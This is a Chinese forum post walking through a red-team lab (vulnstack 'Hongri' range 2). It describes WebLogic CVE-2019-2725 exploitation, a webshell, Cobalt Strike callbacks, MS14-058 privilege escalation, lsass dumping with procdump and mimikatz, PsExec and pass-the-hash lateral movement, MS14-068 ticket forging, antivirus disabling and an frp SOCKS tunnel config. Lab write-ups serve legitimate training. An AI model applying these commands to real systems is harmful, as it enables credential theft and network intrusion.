ToB企服应用市场:ToB评测及商务社交产业平台

标题: 红日靶场(二)ATT&CK红队评估第一次打+复盘总结 [打印本页]
作者: 傲渊山岳    时间: 2022-9-16 17:21
标题: 红日靶场(二)ATT&CK红队评估第一次打+复盘总结
下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
环境配置:

web靶机需要恢复到快照3,然后登陆时切换用户为:WEB\de1ay 密码:1qaz@WSX,这样后续还有提权步骤,进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行startweblogic服务
然后我将虚拟机nat网段设置成了和web靶机一样的192.168.111.0/24,然后让web靶机改为自动获取ip,就可以出网了
配置信息:
  1. DC
  2. IP:10.10.10.10 OS:Windows 2012(64)
  3. 应用:AD域
  4. WEB
  5. IP1:10.10.10.80 IP2:192.168.111.4 OS:Windows 2008(64)
  6. 应用:Weblogic 10.3.6MSSQL 2008
  7. PC
  8. IP1:10.10.10.201 IP2:192.168.111.5 OS:Windows 7(32)
复制代码
1.web外网打点

直接pingweb主机发现ping不同,可能是防火墙的问题,nmap用SYN做全端口扫描nmap -sS -Pn -p1-65535 192.168.111.4 Pn为不发送icmp包

逐一尝试每个端口,最后在7001端口发现有内容,扫描一下路径

看一下login这个路径,发现是WebLogic Server 版本: 10.3.6.0

直接搜索一下该版本漏洞,发现存在CVE-2019-2725,本来想直接msf用这个CVE去打,但是发现有360

然后在网上找了个可以利用这个CVE的工具,下载地址:https://github.com/shack2/javaserializetools

然后上传了个冰蝎自带的jsp木马

然后冰蝎成功上线

然后CS设置好监听后直接弹给CS,但是360又给干碎了

这里试了很久,要么就是被360拦截,要么就是无法联动,tnnd,直接物理黑客把360关了(主要是我的虚拟机出忘了,360自动更新了,太菜了shellcode免杀技术不过关)
然后派生给cs,cs成功上线

提权直接使用MS14-058提权,我通过msf直接提不成功,用的以下工具:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-058

发现可以提权后,用cs生成一段powershell上线脚本,然后运行Win64.exe "powershell脚本内容",这样就可以上线cs啦


上线后再派生到msf方便结合进行内网信息收集,这里也可以再多进行下权限维护

2.内网信息收集

CS获取凭据信息

msf查看下域控、域成员等

msf自动建立并查看路由

利用web靶机作为跳板,用msf对内网实时扫描探测,发现了内网主机ip(前面已经知道了10.10.10.10是域控,接下来对域控进行探测)

使用nmap挂上代理对其进行扫描(有点慢)

或者直接使用cs来扫描也是一样的portscan 10.10.10.0/24,内网存活主机探测加端口扫描

扫描结果就是都开启了445和3389
3.域横向

先用永恒之蓝试试域控呢过不能拿下,msf扫描一下看是否存在漏洞,结果显示存在

但是问题是一直没有会话返回,没办法换条路走,用psexec.exe来实现域横向,这里因为是win server 2008的缘故,正好是可以直接抓到明文密码的,直接拿抓到的明文密码试一试(后面都没图了,忘了截)
上传psexec.exe到web靶机,然后因为DC靶机开启了139,445端口,尝试在web靶机上IPC$连一下DC,发现可以连接成功
这时使用psexec获取到DC的system权限就好了
PsExec.exe -accepteula \\DC -s cmd.exe
接下来就需要让DC上线CS,方便后续操作,通过web靶机在cs设置一个中转监听,然后生成该监听器的payload
将payload上传到web靶机,在通过IPC$共享复制到DC靶机上
system权限运行,CS成功上线DC域控靶机,然后我可以用打域控同样的方式拿下PC靶机
3.其他方式的内网渗透

因为上面的内网渗透方式是直接打的,有许多不足,后面复盘的时候有尝试勒几种不同的方式,不过因为没截图,所以接来下就都用文字说明了~
杀软的问题

上面我是直接手动把杀软关了,后面发现除了做免杀还是有办法的(主要做了好久发现还是过不了360,太菜了)
获取webshell后上传MS14-058.exe的提权工具(我做了简单的免杀后这个没有被360杀掉,msf的shellcode是怎么都被杀),然后上传procdump.exe,用该提权工具以system权限运行procdump.exe -accepteula -ma lsass.exe lsass.dmp导出lsass信息,然后下载到本地,用mimikatz离线获取到管理员明文密码(其实这么简单的密码NTLM Hash爆破也出来了)
有了明文密码之后,因为第一次扫描就发现开了3389,直接3389登录管理员身份远程桌面,手动关掉杀软就行,PC靶机也可使用此方式,不过要先搭建socks代理用web靶机将流量转发出来才可以连接到PC的RDP
ps:这里我后续还测试了msf的killav以及强制taskkill /PID /F等,都是关不掉的,只能手动点击关闭,或者师傅们有别的办法可以传授我~
域横向的其他方法

之前我是直接用psexec.exe通过明文密码的方式横向移动的,但是psexec这个工具并不好,会产生大量日志
这里我们用wmic.py工具先进行PTH攻击,然后用ipc$的方式连接域控,上传shellcode(因为域控没有杀软),或者是
或者我们可以用PTT的方式,利用ms14-068漏洞,执行下面命令获得可以访问域控的票据,再把票据注入内存
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
ps:这里顺便想说一下我在域内比如要用impacket包里的python脚本工具怎么办,比如wmic.py,因为想web靶机没有Python环境,只能将流量代理出来,cs的socks4a速度慢得很,msf的socks代理我感觉总是有有问题,所以还是自己上传frp或ew这种手动建立socks5要快一些
我一般使用frp,frp建立socks5代理只需要修改frpc.ini即可(新get到的,之前都是用ew)
frpc.ini配置:
  1. [common]
  2. server_addr = 服务器IP
  3. server_port = 7778
  4. [sock5]
  5. type = tcp
  6. remote_port =8111
  7. plugin = socks5
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4